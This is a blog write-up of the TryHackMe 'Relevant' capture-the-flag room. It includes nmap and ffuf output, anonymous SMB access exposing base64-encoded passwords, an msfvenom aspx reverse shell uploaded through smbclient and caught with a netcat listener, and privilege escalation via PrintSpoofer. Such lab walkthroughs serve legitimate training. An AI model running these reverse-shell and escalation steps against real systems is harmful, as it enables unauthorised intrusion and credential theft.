Post

TryHackMe Relevant

Posted
By Jason Kenyon
6 min read

Information Gathering

We are given the following

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.

Scope of Work

The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:

User.txt Root.txt Additionally, the client has provided the following scope allowances:

Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first Locate and note all vulnerabilities found Submit the flags discovered to the dashboard Only the IP address assigned to your machine is in scope Find and report ALL vulnerabilities (yes, there is more than one path to root) (Roleplay off)

I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnSecurity Certified Professional Penetration Tester or career as a penetration tester in the field. Note - Nothing in this room requires Metasploit

Machine may take up to 5 minutes for all services to start.

Writeups will not be accepted for this room.

The target IP is 10.10.154.250.

Our objectives are to

  1. Locate and secure the User.txt file,
  2. Locate and secure the Root.txt file, and
  3. Find and report all vulnerabilities on the target host.

Enumeration

We begin with the nmap scan nmap -T5 -PS -sT -sV -sC -O 10.10.154.250 and receive the following output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-07 10:09 EST
Nmap scan report for 10.10.154.250
Host is up (0.10s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-07T15:10:05+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2025-01-06T15:02:43
|_Not valid after:  2025-07-08T15:02:43
| rdp-ntlm-info:
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2025-01-07T15:09:25+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2016|2008|7 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2016 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-01-07T07:09:30-08:00
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2025-01-07T15:09:26
|_  start_date: 2025-01-07T15:03:00
|_clock-skew: mean: 1h36m00s, deviation: 3h34m42s, median: 0s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.39 seconds

The target appears to be a typical windows server hosting a webs server on port 80/TCP and SMB on the typical ports, 139/TCP and 445/TCP. It appears that on port 3389/TCP, an RDP instance is running.

A more thorough scan, of all the TCP ports, reveals the following additional services:

1
2
3
4
5
6
7

49663/tcp open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC

For good measure, we enumerate the SMB shares with nmap --script samba-enum-shares.nse -p 445 10.10.154.250:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.154.250\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.154.250\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.154.250\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.154.250\nt4wrksv:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|_    Current user access: READ/WRITE

Vulnerability: We successfully authenticate to the \\10.10.154.250\nt4wrksv share anonymously and locate a file named passwords.txt. This file contains

1
2
3

[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Presumably, the file contains a pair of base64-encoded passwords. We decode them using echo '<LINE>' | base64 -d for each lineLINE. This uncovers the following

1
2

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$

Perhaps, we can use these credentials to authenticate to an RDP session. We would need to identify some usernames, however. Attempting to sign in through RDP using xfreerdp /v:10.10.154.250 /u:<USER> /p:<PASS> for each combination of the strings Bob, Bill, !P@$$W0rD!123, and Juw4nnaM4n420696969!$$$ fails. This suggests that we should pursue another attack vector.

Next, we fuzz for directories on the http server on port 80/TCP using ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.154.250 -ic, but we find nothing.

Instead, we fuzz for directories on the alternate web server on port TCP/49663 with ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.112.186:49663/FUZZ -ic.

We find the endpoint http://10.10.112.186:49663/nt4wrksv, which matches the name of the SMB share to which we previously authenticated.

Exploitation

Upon visiting http://10.10.112.186:49663/passwords.txt, we find the same file we found in the SMB share. This indicates that the server is hosting files from the share.

We generate an aspx reverse shell with msfvenom -p windows/shell/reverse_tcp -f aspx -o shell.aspx LHOST=10.6.4.176.

We then upload the shell to the share with the commandssmbclient //10.10.112.186/nt4wrksv and put shell.aspx shell.aspx. Afterward, we set up a netcat listener with nc -lvnp 4444. Upon navigating to http://10.10.112.186:49633/shell.aspx, we receive a shell as iis apppool\defaultapppool.

As we are searching for the User.txt file we run the command where /R c:\ User.txt to locate it. This reveals that it is found at c:\Users\Bob\Desktop\User.txt.

We then navigate to the directory and obtain the user flag:

Post-Exploitation

Running, whoami /all reveals that we possess the SeImpersonate privilege. To exploit this we, use PrintSpoofer.exe (The source code may be located at https://github.com/itm4n/PrintSpoofer). We simply upload the executable using smbclient and run it.

This gives us a root shell, so we use where /R c:\ Root.txt to locate the root flag. This tells us that the flag is located at c:\Users\Administrator\Desktop. We navigate to this directory and capture the flag:

CTFs
tryhackme
This post is licensed under CC BY 4.0 by the author.

Trending Tags

tryhackme